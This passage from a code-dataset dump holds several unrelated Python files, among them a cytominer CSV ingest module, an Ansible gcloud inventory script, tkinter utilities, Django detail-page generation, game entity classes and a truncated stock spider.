all these CSV files into a database backend. SQLite is the\nrecommended engine, but ingest will likely also work with PostgreSQL and MySQL.\n\n``cytominer_database.ingest.seed`` assumes a directory structure like shown below:\n\n| plate_a/\n| set_1/\n| file_1.csv\n| file_2.csv\n| ...\n| file_n.csv\n| set_2/\n| file_1.csv\n| file_2.csv\n| ...\n| file_n.csv\n| ...\n| set_m/\n| file_1.csv\n| file_2.csv\n| ...\n| file_n.csv\n\nExample::\n\n import cytominer_database.ingest\n\n cytominer_database.ingest.seed(source, target, config)\n\"\"\"\n\nimport os\nimport csv\nimport click\nimport warnings\nimport zlib\n\nimport pandas as pd\nimport backports.tempfile\nimport sqlalchemy.exc\nfrom sqlalchemy import create_engine\n\nimport cytominer_database.utils\n\n\ndef __format__(name, header):\n if header in [\"ImageNumber\", \"ObjectNumber\"]:\n return header\n\n return \"{}_{}\".format(name, header)\n\n\ndef into(input, output, name, identifier, skip_table_prefix=False):\n \"\"\"Ingest a CSV file into a table in a database.\n\n :param input: Input CSV file.\n :param output: Connection string for the database.\n :param name: Table in database into which the CSV file will be ingested\n :param identifier: Unique identifier for ``input``.\n :param skip_table_prefix: True if the prefix of the table name should be excluded\n from the names of columns.\n \"\"\"\n\n with backports.tempfile.TemporaryDirectory() as directory:\n source = os.path.join(directory, os.path.basename(input))\n\n # create a temporary CSV file which is identical to the input CSV file\n # but with the column names prefixed with the name of the compartment\n # (or `Image`, if this is an image CSV file, and `skip_table_prefix` is False)\n with open(input, \"r\") as fin, open(source, \"w\") as fout:\n reader = csv.reader(fin)\n writer = csv.writer(fout)\n\n headers = next(reader)\n if not skip_table_prefix:\n headers = [__format__(name, header) for header in headers]\n\n # The first column is `TableNumber`, which is the unique identifier for the image CSV\n headers = [\"TableNumber\"] + headers\n\n writer.writerow(headers)\n\n 
[writer.writerow([identifier] + row) for row in reader]\n\n # Now ingest the temp CSV file (with the modified column names) into the database backend\n # the rows of the CSV file are inserted into a table with name `name`.\n with warnings.catch_warnings():\n # Suppress the following warning on Python 3:\n #\n # /usr/local/lib/python3.6/site-packages/odo/utils.py:128: DeprecationWarning: inspect.getargspec() is\n # deprecated, use inspect.signature() or inspect.getfullargspec()\n warnings.simplefilter(\"ignore\", category=DeprecationWarning)\n\n engine = create_engine(output)\n con = engine.connect()\n\n df = pd.read_csv(source, index_col=0)\n df.to_sql(name=name, con=con, if_exists=\"append\")\n\ndef checksum(pathname, buffer_size=65536):\n \"\"\"\n Generate a 32-bit unique identifier for a file.\n \n :param pathname: input file\n :param buffer_size: buffer size \n \"\"\"\n with open(pathname, \"rb\") as stream:\n result = zlib.crc32(bytes(0))\n\n while True:\n buffer = stream.read(buffer_size)\n\n if not buffer:\n break\n\n result = zlib.crc32(buffer, result)\n\n return result & 0xffffffff\n\ndef seed(source, target, config_file, skip_image_prefix=True):\n \"\"\"\n Read CSV files into a database backend.\n\n :param config_file: Configuration file.\n :param source: Directory containing subdirectories that contain CSV files.\n :param target: Connection string for the database.\n :param skip_image_prefix: True if the prefix of image table name should be excluded\n from the names of columns from per image table\n \"\"\"\n config_file = cytominer_database.utils.read_config(config_file)\n\n # list the subdirectories that contain CSV files\n directories = sorted(list(cytominer_database.utils.find_directories(source)))\n\n for directory in directories:\n\n # get the image CSV and the CSVs for each of the compartments\n try:\n compartments, image = cytominer_database.utils.validate_csv_set(config_file, directory)\n except IOError as e:\n click.echo(e)\n\n continue\n\n # get a unique identifier for the image CSV. 
This will later be used as the TableNumber column\n # the casting to int is to allow the database to be readable by CellProfiler Analyst, which\n # requires TableNumber to be an integer.\n identifier = checksum(image)\n\n name, _ = os.path.splitext(config_file[\"filenames\"][\"image\"])\n\n # ingest the image CSV\n try:\n into(input=image, output=target, name=name.capitalize(), identifier=identifier,\n skip_table_prefix=skip_image_prefix)\n except sqlalchemy.exc.DatabaseError as e:\n click.echo(e)\n\n continue\n\n # ingest the CSV for each compartment\n for compartment in compartments:\n name, _ = os.path.splitext(os.path.basename(compartment))\n\n into(input=compartment, output=target, name=name.capitalize(), identifier=identifier)\n","sub_path":"cytominer_database/ingest.py","file_name":"ingest.py","file_ext":"py","file_size_in_byte":6002,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"225557984","text":"#!/usr/bin/python\nimport json\nimport os\nrequest = os.popen(\"gcloud compute instances list | awk '{print $1, $4, $5}'\").read()\n\nip_dict = {\"app\":{}, \"db\":{}}\nfor ip in request.split('\\n')[1:-1]:\n if str(ip.split(' ')[0]).endswith(\"app\"):\n ip_dict[\"app\"][\"hosts\"]=[str(ip.split(' ')[2])]\n else:\n ip_dict[\"db\"][\"hosts\"]=[str(ip.split(' ')[2])]\n ip_dict[\"app\"][\"vars\"]={\"db_host\":str(ip.split(' ')[1])}\n\ndata = ip_dict\n\n\njson_data = json.dumps(data)\nprint(json_data)\n\n\n","sub_path":"ansible/environments/stage/dynamic-inventory.py","file_name":"dynamic-inventory.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"175128570","text":"import tkinter as tk\n\ninterfaz = tk.Tk()\ninterfaz.geometry(\"400x350\")\ninterfaz.title(\"promedio\")\ninterfaz.configure(background= '#26a69a')\nvar=tk.DoubleVar()\n\nc1 = tk.Label(interfaz, text= \"Ingrese Calificación 1\", bg=\"#5c6bc0\", fg=\"white\")\nc1.pack(padx=5, pady=4, ipadx=5, ipady=5, fill=tk.X)\nn1 = tk.Entry(interfaz)\nn1.pack(padx=5, pady=5, ipadx=5, ipady=5, fill=tk.X)\n\nc2 = tk.Label(interfaz, text= \"Ingrese Calificación 2\", bg=\"#5c6bc0\", fg=\"#f5f5f5\")\nc2.pack(padx=5, pady=4, ipadx=5, ipady=5, fill=tk.X)\nn2 = tk.Entry(interfaz)\nn2.pack(padx=5, pady=5, ipadx=5, ipady=5, fill=tk.X)\n\nc3 = tk.Label(interfaz, text= \"Ingrese Calificación 3\", bg=\"#5c6bc0\", fg=\"#f5f5f5\")\nc3.pack(padx=5, pady=4, ipadx=5, ipady=5, fill=tk.X)\nn3 = tk.Entry(interfaz)\nn3.pack(padx=5, pady=5, ipadx=5, ipady=5, fill=tk.X)\n\nc4 = tk.Label(interfaz, text= \"Ingrese Nota Examen final\", bg=\"#5c6bc0\", fg=\"white\")\nc4.pack(padx=5, pady=4, ipadx=5, ipady=5, fill=tk.X)\nn4 = tk.Entry(interfaz)\nn4.pack(padx=5, pady=5, ipadx=5, ipady=5, fill=tk.X)\n\nc5 = tk.Label(interfaz, text= \"Ingrese Nota trabajo final\", bg=\"#5c6bc0\", fg=\"white\")\nc5.pack(padx=5, pady=4, ipadx=5, ipady=5, fill=tk.X)\nn5 = tk.Entry(interfaz)\nn5.pack(padx=5, pady=5, ipadx=5, ipady=5, fill=tk.X)\n\n\ndef promedio():\n c1 = float(n1.get()) + float(n2.get()) + float(n3.get())\n c1 = c1 / 3 * float(0.55)\n c4 = float(n4.get()) * float(0.30)\n c5 = float(n5.get()) * float(0.15)\n cf = c1 + c4 + c5\n\n return var.set(cf)\n\nresultado= tk.Label(interfaz, textvariable = var, padx = 5, pady= 5, width = 50)\nresultado.pack()\nboton1 = tk.Button(interfaz, text= \"Resultado\", bg = \"#ef5350\", command = promedio)\nboton1.pack(side= 
tk.TOP)\n\ninterfaz.mainloop()","sub_path":"punto4.py","file_name":"punto4.py","file_ext":"py","file_size_in_byte":1699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"65725844","text":"# Validating response status codes and headers using response object\n\nimport requests\n\nbaseUrl = 'http://216.10.245.166/Library/GetBook.php'\nresponse2 = requests.get(baseUrl, params={'AuthorName': 'Tester'},)\n# print('Response status code is: \\t', response2)\nprint('Response status code is: \\t', response2.status_code) # checking status code\nassert response2.status_code == 200 # asserting status code as 200\nresponse2Header = response2.headers # storing response headers.\nprint('Response headers are: \\n', response2Header) # printing response headers\n\n# validating 'Content-Type' header is 'application/json;charset=UTF-8'\nassert response2Header['Content-Type'] == 'application/json;charset=UTF-8' # asserting for required value\nif response2Header['Content-Type'] == 'application/json;charset=UTF-8':\n print('Content-Type is: \\n', response2Header['Content-Type'])\nelse:\n print('Content-Type is not as expected')\n\n# response cookies\nprint('Response cookies are: \\n', response2.cookies)\n\n# Retrieve the book details for isbn = tretrer i.e match isbn and then print complete book details.\nresponse2Json = response2.json()\nprint('Search response data:\\t', response2Json)\nlengthOfResponse2Json = len(response2Json)\ndataResponse2 = {}\nfor actualBook in range(lengthOfResponse2Json): # iterating through the list\n dataResponse2 = response2Json[actualBook] # storing element in each iteration to a variable\n if dataResponse2['isbn'] == 'tretrer': # evaluating condition\n print(dataResponse2) # printing resultant book details\n break\nexpectedBook = {\n \"book_name\": \"ocean\",\n \"isbn\": \"tretrer\",\n \"aisle\": \"333\"\n }\nassert expectedBook == dataResponse2 # asserting for expected book details\n","sub_path":"pythonBasics/tests/2apiValidation.py","file_name":"2apiValidation.py","file_ext":"py","file_size_in_byte":1740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"28683820","text":"# ------------ Math ------------------------------------------------------------------------------------ #\r\nclass Vector:\r\n\tdef __init__(self, x, y):\r\n\t\tself.x = x\r\n\t\tself.y = y\r\n\tdef __str__(self):\r\n\t\treturn \"%0.2f %0.2f\" % (self.x, self.y)\r\n\tdef setMagnitude(self, mag):\r\n\t\tif mag == 0:\r\n\t\t\tself.x = 0\r\n\t\t\tself.y = 0\r\n\t\telse: ## This does not work when the values for x and y are both 0\r\n\t\t\tself.x, self.y = self.x/float((self.x**2+self.y**2)**0.5)*mag,self.y/float((self.x**2+self.y**2)**0.5)*mag\r\n\tdef getMagnitude(self):\r\n\t\treturn ((self.x)**2+(self.y)**2)**0.5\r\n\tdef add(self, vector):\r\n\t\tself.x += vector.x\r\n\t\tself.y += vector.y\r\n\tdef distance(self, vector):\r\n\t\treturn ((self.x-vector.x)**2+(self.y-vector.y)**2)**0.5\r\n\tdef negative(self):\r\n\t\treturn Vector(-self.x, -self.y)\r\n\tdef copy(self):\r\n\t\treturn Vector(-(-self.x),-(-self.y))\r\n\tdef sin(self):\r\n\t\ttry:\r\n\t\t\treturn self.y/self.getMagnitude()\r\n\t\texcept:\r\n\t\t\treturn None\r\n\tdef cos(self):\r\n\t\ttry:\r\n\t\t\treturn self.x/self.getMagnitude()\r\n\t\texcept:\r\n\t\t\treturn None\r\n\tdef tan(self):\r\n\t\ttry:\r\n\t\t\treturn self.y/self.x\r\n\t\texcept:\r\n\t\t\treturn None\r\n\tdef delta(self, vector):\r\n\t\treturn Vector(-self.x+vector.x, 
-self.y+vector.y)\r\n\tdef scale(self, scalar_multiple):\r\n\t\treturn Vector(self.x*scalar_multiple,self.y*scalar_multiple)\r\n\r\n# ------------ Entities -------------------------------------------------------------------------------- #\r\nclass Entity:\r\n\tdef __init__(self, id, position, direction, speed, moving, animations = None):\r\n\t\tself.id = id\r\n\t\tself.position = position\r\n\t\tself.direction = direction\r\n\t\tself.speed = speed\r\n\t\tself.moving = moving\r\n\t\tself.animations = animations\r\n\t\t\r\n\t\tself.shad_size = (20,14)\r\n\t\tself.velocity = Vector(0,0)\r\n\t\tself.fixAnim = False\r\n\t\tself.__fix__()\r\n\tdef __dict__(self):\r\n\t\treturn {'id':self.id, 'position':self.position, 'direction':self.direction,'speed':self.speed}\r\n\tdef __fix__(self):\r\n\t\t#print self.get()\r\n\t\tif self.moving:\r\n\t\t\tif self.direction == 7 or self.direction == 0 or self.direction == 1:\r\n\t\t\t\tself.velocity.y = -1\r\n\t\t\telif self.direction == 3 or self.direction == 4 or self.direction == 5:\r\n\t\t\t\tself.velocity.y = 1\r\n\t\t\telse:\r\n\t\t\t\tself.velocity.y = 0\r\n\t\t\tif self.direction == 5 or self.direction == 6 or self.direction == 7:\r\n\t\t\t\tself.velocity.x = -1\r\n\t\t\telif self.direction == 1 or self.direction == 2 or self.direction == 3:\r\n\t\t\t\tself.velocity.x = 1\r\n\t\t\telse:\r\n\t\t\t\tself.velocity.x = 0\r\n\t\t\t#print self.velocity\r\n\t\t\tself.velocity.setMagnitude(self.speed)\r\n\t\t\t#print self.velocity\r\n\t\t\tif self.animations and self.fixAnim:\r\n\t\t\t\tself.fixAnim = False\r\n\t\t\t\t#print 'resetting'\r\n\t\t\t\tself.animations[self.direction].reset()\r\n\t\telse:\r\n\t\t\tself.velocity.setMagnitude(0)\r\n\t\t\tif self.animations and self.fixAnim:\r\n\t\t\t\tself.fixAnim = False\r\n\t\t\t\t#print 'resetting'\r\n\t\t\t\tself.animations[self.direction+8].reset()\r\n\tdef setDirection(self,direction):\r\n\t\tif direction != self.direction:\r\n\t\t\tself.direction = direction\r\n\t\t\tself.__fix__()\r\n\t\t\tself.fixAnim = True\r\n\t\t\treturn True\r\n\tdef setMoving(self, moving):\r\n\t\tif self.moving != moving:\r\n\t\t\t#print moving\r\n\t\t\tself.moving = moving\r\n\t\t\tself.__fix__()\r\n\t\t\tself.fixAnim = True\r\n\t\t\treturn True\r\n\tdef setSpeed(self, speed):\r\n\t\tself.speed = speed\r\n\t\tself.__fix__()\r\n\tdef update(self, delta):\r\n\t\tself.position.add(self.velocity.scale(delta))\r\n\t\t#if not self.moving:\r\n\t\t#\tprint self.id, 'can\\'t move\\t', self.velocity\r\n\t\t#else:\r\n\t\t#\tprint self.id, 'can move\\t', self.velocity\r\n\t\tif self.animations:\r\n\t\t\tif self.moving:\r\n\t\t\t\tself.animations[self.direction].update(delta)\r\n\t\t\telse:\r\n\t\t\t\tself.animations[self.direction + 8].update(delta)\r\n\tdef get(self):\r\n\t\t#print self.id,self.position.x,self.position.y,self.direction,self.speed, self.moving\r\n\t\treturn 'E%s %0.0f %0.0f %d %d %d' % (self.id,self.position.x,self.position.y,self.direction,self.speed, self.moving)\r\n\tdef getImage(self):\r\n\t\t#print repr(self.moving), self.direction\r\n\t\tif self.moving:\r\n\t\t\treturn self.animations[self.direction].getImage()\r\n\t\telse:\r\n\t\t\treturn self.animations[self.direction + 8].getImage()\r\n\tdef getShadow(self):\r\n\t\timport pygame  # pygame is used only here and was never imported at module level\r\n\t\ts = pygame.Surface(self.shad_size,pygame.SRCALPHA)\r\n\t\tpygame.draw.ellipse(s, (10,10,20),(0,0,self.shad_size[0],self.shad_size[1]))\r\n\t\treturn s\r\nclass Character(Entity):\r\n\tdef __init__(self, id, position, direction, speed, moving, name, skin, hair, equipment, animations = 
None):\r\n\t\tEntity.__init__(self, id, position, direction, speed, moving, animations)\r\n\t\tself.name = name\r\n\t\tself.skin = skin\r\n\t\tself.hair = hair\r\n\t\tself.equipment = equipment\r\n\tdef getChar(self):\r\n\t\treturn 'C%s %0.0f %0.0f %d %d %d %s' % (self.id,self.position.x,self.position.y,self.direction,self.speed, self.moving, self.name)\r\nclass Mob(Entity):\r\n\tdef __init__(self, id, position, direction, speed, moving, name, type, level, animations = None):\r\n\t\tEntity.__init__(self, id, position, direction, speed, moving, animations)\r\n\t\tself.name = name\r\n\t\tself.type = type\r\n\t\tself.level = level\r\nclass Item(Entity):\r\n\tdef __init__(self, id, position, direction, speed, moving, item_number, animations = None):\r\n\t\tEntity.__init__(self, id, position, direction, speed, moving, animations)\r\n\t\tself.item_number = item_number\r\nclass Projectile(Entity):\r\n\tdef __init__(self, id, position, direction, speed, moving, projectile_number, animations = None):\r\n\t\tEntity.__init__(self, id, position, direction, speed, moving, animations)\r\n\t\tself.projectile_number = projectile_number\r\n\r\n\t\t\r\nclass Chunk:\r\n\tdef __init__(self, location,byte_array_a = None,byte_array_b = None):\r\n\t\tself.location = location\r\n\t\tself.byte_array_a = byte_array_a\r\n\t\tself.byte_array_b = byte_array_b\r\n\t\tself.floor = []\r\n\t\tself.environment = []\r\n\t\tself.floor_image = None\r\n\t\tself.rows = []\r\n\t\tself.loaded = False\r\n\t\tself.block_width = 32\r\n\t\tself.chunk_width = 0\r\n\t\tif self.byte_array_a:\r\n\t\t\tself.buildFloor()\r\n\t\tif self.byte_array_b:\r\n\t\t\tself.buildEnv()\r\n\t\ttemp = self.location.split('_')\r\n\t\ttemp = (int(temp[0]), int(temp[1]))\r\n\t\tself.x = temp[0] * 32 * self.chunk_width\r\n\t\tself.y = temp[1] * 32 * self.chunk_width\r\n\tdef buildFloor(self):\r\n\t\tself.chunk_width = int(len(self.byte_array_a) ** 0.5)\r\n\t\tfor i in range(self.chunk_width):\r\n\t\t\tself.floor.append(self.byte_array_a[i*self.chunk_width:(i+1)*self.chunk_width])\r\n\tdef buildEnv(self):\r\n\t\tsize = int(len(self.byte_array_b) ** 0.5)\r\n\t\tfor i in range(size):\r\n\t\t\tself.environment.append(self.byte_array_b[i*size:(i+1)*size])\r\n\tdef getFloor(self):\r\n#\t\tprint len(self.byte_array_a)\r\n\t\treturn 'mf%s %s' % (self.location, self.byte_array_a)\r\n\tdef setFloor(self, byte_array):\r\n\t\tself.byte_array_a = byte_array\r\n\t\tself.buildFloor()\r\n\tdef getEnvironment(self):\r\n\t\treturn 'me%s %s' % (self.location, self.byte_array_b)\r\n\tdef setEnvironment(self, byte_array):\r\n\t\tself.byte_array_b = byte_array\r\n\t\tself.buildEnv()\r\n\r\nclass Map:\r\n\tdef __init__(self, size):\r\n\t\tself.size = size\r\n\t\tself.folder_location = 'Map'\r\n\t\tself.chunks = {}\r\n\t\tself.loadMap()\r\n\tdef loadMap(self):\r\n\t\tfor i in range(self.size):\r\n\t\t\tfor j in range(self.size):\r\n\t\t\t\tfile = open('%s/Floor/%d_%d.SAM' % (self.folder_location, i-self.size/2, j-self.size/2), 'rb')\r\n\t\t\t\tbyte_array_a = file.read()\r\n\t\t\t\tfile.close()\r\n\t\t\t\tfile = open('%s/Env/%d_%dE.SAM' % (self.folder_location, i-self.size/2, j-self.size/2), 'rb')\r\n\t\t\t\tbyte_array_b = file.read()\r\n\t\t\t\tfile.close()\r\n\t\t\t\tself.chunks['%d_%d' % (i-self.size/2, j-self.size/2)] = Chunk('%d_%d' % (i-self.size/2, j-self.size/2), byte_array_a, 
byte_array_b)\r\n","sub_path":"Server/misc.py","file_name":"misc.py","file_ext":"py","file_size_in_byte":7358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"423481791","text":"# State machine constants for the StateMachine class below\nSTATE_INTRO = 1\nSTATE_MENU = 2\nSTATE_HELP = 3\nSTATE_ABOUT = 4\nSTATE_PLAY = 5\n\nclass StateMachine(object):\n    \"\"\"\n    Manages a stack based state machine.\n    peek(), pop() and push() perform as traditionally expected.\n    peeking and popping an empty stack returns None.\n    \"\"\"\n    \n    def __init__ (self):\n        self.statestack = []\n    \n    def peek(self):\n        \"\"\"\n        Returns the current state without altering the stack.\n        Returns None if the stack is empty.\n        \"\"\"\n        try:\n            return self.statestack[-1]\n        except IndexError:\n            # empty stack\n            return None\n    \n    def pop(self):\n        \"\"\"\n        Pop the current state off the stack.\n        Returns True if any states remain afterwards, False if the\n        stack is now empty, and None if it was already empty.\n        \"\"\"\n        try:\n            self.statestack.pop()\n            return len(self.statestack) > 0\n        except IndexError:\n            # empty stack\n            return None\n    \n    def push(self, state):\n        \"\"\"\n        Push a new state onto the stack.\n        Returns the pushed value.\n        \"\"\"\n        self.statestack.append(state)\n        return state\n","sub_path":"model/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1196,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"88350087","text":"# import os,sys\n# import django\n# os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'meiduo_mall.settings.dev')\n# sys.path.insert(0, '/home/ubuntu/Desktop/meiMall/meiduo_mall')\n# django.setup()\n\nimport os  # os is needed below to build the static html file path\n\nfrom django.template import loader\nfrom django.conf import settings\nfrom apps.goods.models import GoodsChannel,\\\n    GoodsCategory,SKU,SKUImage,SKUSpecification,GoodsSpecification,SpecificationOption\nfrom collections import OrderedDict\nfrom copy import deepcopy\n\n\ndef get_breadcrumb(category):\n\n    dict = {\n        'cat1':'',\n        'cat2':'',\n        'cat3':'',\n    }\n\n    if category.parent is None:\n        dict['cat1'] = category.name\n\n\n    elif category.parent.parent is None:\n        dict['cat2'] = category.name\n        dict['cat1'] = category.parent.name\n\n    elif category.parent.parent.parent is None:\n        dict['cat3'] = category.name\n        dict['cat2'] = category.parent.name\n        dict['cat1'] = category.parent.parent.name\n\n    return dict\n\n\ndef get_categories():\n\n    categories = OrderedDict()\n\n    channels = GoodsChannel.objects.order_by(\n        'group_id',\n        'sequence'\n    )\n\n    for channel in channels:\n        # if this is the first time this group is seen, add a new key for it (the key is the group_id)\n        if channel.group_id not in categories:\n            categories[channel.group_id] = {\n                'channels': [],\n                'sub_cats': []\n            }\n\n        # build the channel and category info of the current group\n        cat1 = channel.category\n        categories[channel.group_id]['channels'].append({\n            'id': cat1.id,\n            'name': cat1.name,\n            'url': channel.url\n        })\n\n        # all second-level categories whose parent is the first-level category cat1\n        cat2s = GoodsCategory.objects.filter(\n            parent=cat1\n        )\n\n        for cat2 in cat2s:\n            cat3_list = []  # collect the third-level categories under the second-level category cat2\n\n            cat3s = GoodsCategory.objects.filter(\n                parent=cat2\n            )\n\n            for cat3 in cat3s:\n                cat3_list.append({\n                    'id': cat3.id,\n                    'name': cat3.name\n                })\n\n            categories[channel.group_id]['sub_cats'].append({\n                'id': cat2.id,\n                'name': cat2.name,\n                'sub_cats': cat3_list  # fill in the third-level categories\n            })\n    return categories\n\n\n\ndef get_goods_and_spec(sku_id):\n\n    sku = SKU.objects.get(pk=sku_id)\n    # record the option combination of the current sku\n    cur_sku_spec_options = SKUSpecification.objects.filter(sku=sku).order_by('spec_id')\n    cur_sku_options = []\n    for temp in cur_sku_spec_options:\n        
cur_sku_options.append(temp.option_id)\n\n    goods = sku.goods\n    # map every sibling SKU's option combination to its sku id\n    sku_options_mapping = {}\n    skus = SKU.objects.filter(goods=goods)\n    for temp_sku in skus:\n        sku_spec_options = SKUSpecification.objects.filter(sku=temp_sku).order_by('spec_id')\n        sku_options = []\n        for temp in sku_spec_options:\n            sku_options.append(temp.option_id)\n        sku_options_mapping[tuple(sku_options)] = temp_sku.id\n\n    sku.images = SKUImage.objects.filter(sku=sku)\n\n\n    specs = GoodsSpecification.objects.filter(goods=goods).order_by('id')\n\n\n\n    for index,spec in enumerate(specs):\n        options = SpecificationOption.objects.filter(spec=spec)\n\n        temp_list = deepcopy(cur_sku_options)\n\n        for option in options:\n            temp_list[index] = option.id\n\n\n            option.sku_id = sku_options_mapping.get(tuple(temp_list))\n\n        # attach the option list to this individual spec\n        spec.spec_options = options\n\n    return goods,sku,specs\n\n\ndef generate_static_sku_detail_html(sku_id):\n\n    # ================= fetch the categories (channel info), same as in generate_index\n\n    categories = get_categories()\n\n    goods,sku,specs = get_goods_and_spec(sku_id)\n\n    # ==================== build the template context =========================\n    context = {\n        'categories':categories,\n        'goods':goods,\n        'specs':specs,\n        'sku':sku\n    }\n    # load the template\n    template = loader.get_template('detail.html')\n\n    # render the template into the complete html page\n    sku_html_text = template.render(context=context)\n\n\n    # write the static file\n    file_path = os.path.join(\n        settings.GENERATED_STATIC_HTML_FILES_DIR,\n        'goods/' + str(sku_id) + '.html'\n    )\n    with open(file_path,'w',encoding='utf-8') as f:\n        f.write(sku_html_text)\n\n\n# if __name__ == '__main__':\n#     skus = SKU.objects.all()\n#     for sku in skus:\n#         print(sku.id)\n#         generate_static_sku_detail_html(sku.id)\n\n","sub_path":"meiduo_mall/apps/goods/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"384940139","text":"import webbrowser\nfrom tkinter import *\n\nform = {\n    'dictionary': \"https://www.dictionary.com/browse/\",\n    'thesaurus': \"https://www.thesaurus.com/browse/\"\n}\n\n\ndef choose_source():\n    question = \"Would you like to visit the dictionary or the thesaurus?\"\n    print(question)\n    while True:\n        source = input('> ').lower()\n        # if the search engine is a valid entry\n        if source in form:\n            engine_name = source.capitalize()\n            # gets the base url of the entered channel\n            base_url = form[source]\n        else:\n            print('Wrong answer! 
Try again.\\n')\n print(question)\n # continues the operation\n continue\n # returns the news channel and the news channel's search link\n return engine_name, base_url\n\ns, base_url = choose_source()\n\n\n#creates the gui\nroot = Tk()\nroot.title('Fast Forward')\n\n#creates a text-field for the user to enter a sarch\nString_Entry = Entry(root)\nString_Entry.grid(row=0, column=2)\n\ndef search():\n #gets the value from the text-field and saves it to url\n url = base_url + str(String_Entry.get())\n #forces the web browser to open the url\n webbrowser.open(url)\n\n text_file = open(\"Out.txt\", \"w\")\n\n\n#creates a button to search the value\nSearch_Button = Button(root, text='Search', command=search)\nSearch_Button.grid(row=0, column=0)\n#creates a button to quit out of the program\nQuit_Button = Button(root, text='Exit', command=quit)\nQuit_Button.grid(row=0, column=1)\n\n\n\n\n#ends the tkinter()\nmainloop()\n","sub_path":"Words/DictionaryThesaurus.py","file_name":"DictionaryThesaurus.py","file_ext":"py","file_size_in_byte":1534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"411967920","text":"\t#!/usr/bin/env python\n\nimport re, os, shutil, time, sys\nfrom string import *\nfrom math import *\nfrom optparse import OptionParser\nimport operator\n\n\"\"\"\nThree sets of intervals of length opt.window:\n opt.flank times upstream and downstream\n gene body divided into opt.number equally spaced windows of length opt.window\n \n \n\"\"\"\n\ndef main(argv):\n\n\tparser = OptionParser()\n\n\tparser.add_option(\"-i\", \"--input\", action=\"store\", type=\"string\", dest=\"input\", metavar=\"\")\n\tparser.add_option(\"-o\", \"--ouput\", action=\"store\", type=\"string\", dest=\"output\", metavar=\"\")\n\tparser.add_option(\"-w\", action=\"store\", type=\"int\", dest=\"window\", metavar=\"\")\n\tparser.add_option(\"-n\", action=\"store\", type=\"int\", dest=\"number\", metavar=\"\")\n\tparser.add_option(\"-d\", action=\"store\", type=\"string\", dest=\"direction\", metavar=\"\")\n\n\t(opt, args) = parser.parse_args(argv)\n\t\n\tinfile = open(opt.input, 'r');\n\toutfile = open(opt.output, 'w');\n\twindow = opt.window\n\tround_factor = int(-log10(window))\n\tnumber = opt.number\n\tdirection = opt.direction\n\tflank_range = xrange(number*2)\n\tgenome_sizes = open('/home/user/packages/bedtools/genomes/mouse.mm9.genome','r');\n\n\td = {}\n\tfor line in genome_sizes:\n\t\tline = line.strip();\n\t\tsline = line.split();\n\t\tif len(sline) > 0:\n\t\t\td[sline[0]]=sline[1];\n\t\n\tfor line in infile:\n\t\tline = line.strip();\n\t\tsline = line.split();\n\t\tstrand = sline[5];\n\t\tinitial_start = 0;\n\t\tinitial_end = 0;\n\t\t\n\t\tif direction == \"start\":\n\t\t\tinitial_start = int(round(atoi(sline[1]),round_factor)) + 1\n\t\t\tinitial_end = int(round(atoi(sline[2]),round_factor))\n\t\t\t#initial_start = atoi(sline[1]) + 1\n\t\t\t#initial_end = atoi(sline[2])\n\t\telif direction == \"end\":\n\t\t\tinitial_end = int(round(atoi(sline[1]),round_factor)) \n\t\t\tinitial_start = int(round(atoi(sline[2]),round_factor)) + 1\n\t\t\t#initial_end = atoi(sline[1])\n\t\t\t#intial_start = atoi(sline[2]) + 1\n\t\tif strand == \"+\":\n\t\t\tstart = initial_start - number * window\n\t\t\tfor index in flank_range:\n\t\t\t\tend = start + window - 1\n\t\t\t\tout = sline[0] + \"\\t\" + str(start) + \"\\t\" + str(end) + \"\\t\" + sline[3] + \"\\t\" + str(index+1) + \"\\t\" + sline[5] + \"\\n\"\n\t\t\t\tif (start >= 0) and (end <= atoi(d[sline[0]])): \n 
\t\t\t\t\toutfile.write(out)\n\t\t\t\tstart = end + 1\n\t\t\t\t\n\t\telse:\n\t\t\tend = initial_end + number * window\n\t\t\tfor index in flank_range:\n\t\t\t\tstart = end - window + 1\n\t\t\t\tout = sline[0] + \"\\t\" + str(start) + \"\\t\" + str(end) + \"\\t\" + sline[3] + \"\\t\" + str(index+1) + \"\\t\" + sline[5] + \"\\n\"\n\t\t\t\tif (start >= 0) and (end <= atoi(d[sline[0]])): \n\t\t\t\t\toutfile.write(out)\n\t\t\t\tend = start - 1\n\t\t\t\t\n\n\toutfile.close();\n\t\t\nif __name__ == \"__main__\":\n\tmain(sys.argv) \t\n","sub_path":"python/bed/windowflanksRound.py","file_name":"windowflanksRound.py","file_ext":"py","file_size_in_byte":2704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"126662404","text":"#!/usr/bin/env python\r\n# -*- encoding: utf-8 -*-\r\n# Created on 2018-07-28 08:49:54\r\n# Project: gpfh4\r\n\r\n# sys\r\nimport json\r\nimport time\r\n# thirdpart\r\nimport pandas as pd\r\nfrom requests.models import RequestEncodingMixin\r\n\r\n# encode_params = RequestEncodingMixin._encode_params\r\n\r\nfrom pymongo import MongoClient\r\nfrom pymongo import errors\r\n\r\n# this project\r\nif __name__ == '__main__':\r\n    import sys\r\n    sys.path.append(r'C:\\workspace\\code\\self\\github\\py-code\\new_stock')\r\n##########################\r\nimport util\r\nimport const\r\nimport query\r\nfrom fake_spider import spider2\r\n\r\n\r\n#####################################################\r\nclass MyNumbers:\r\n    def __init__(self, **kwargs):\r\n        print(dir(query))\r\n        self.codes = query.query_stock_list.queryAllCode()\r\n        self.kwargs = kwargs\r\n        self.counter = 0\r\n    \r\n    def __iter__(self):\r\n        return self\r\n    \r\n    def __next__(self):\r\n        if self.counter < len(self.codes):\r\n            code = self.codes[self.counter]\r\n            head = \"sh\"\r\n        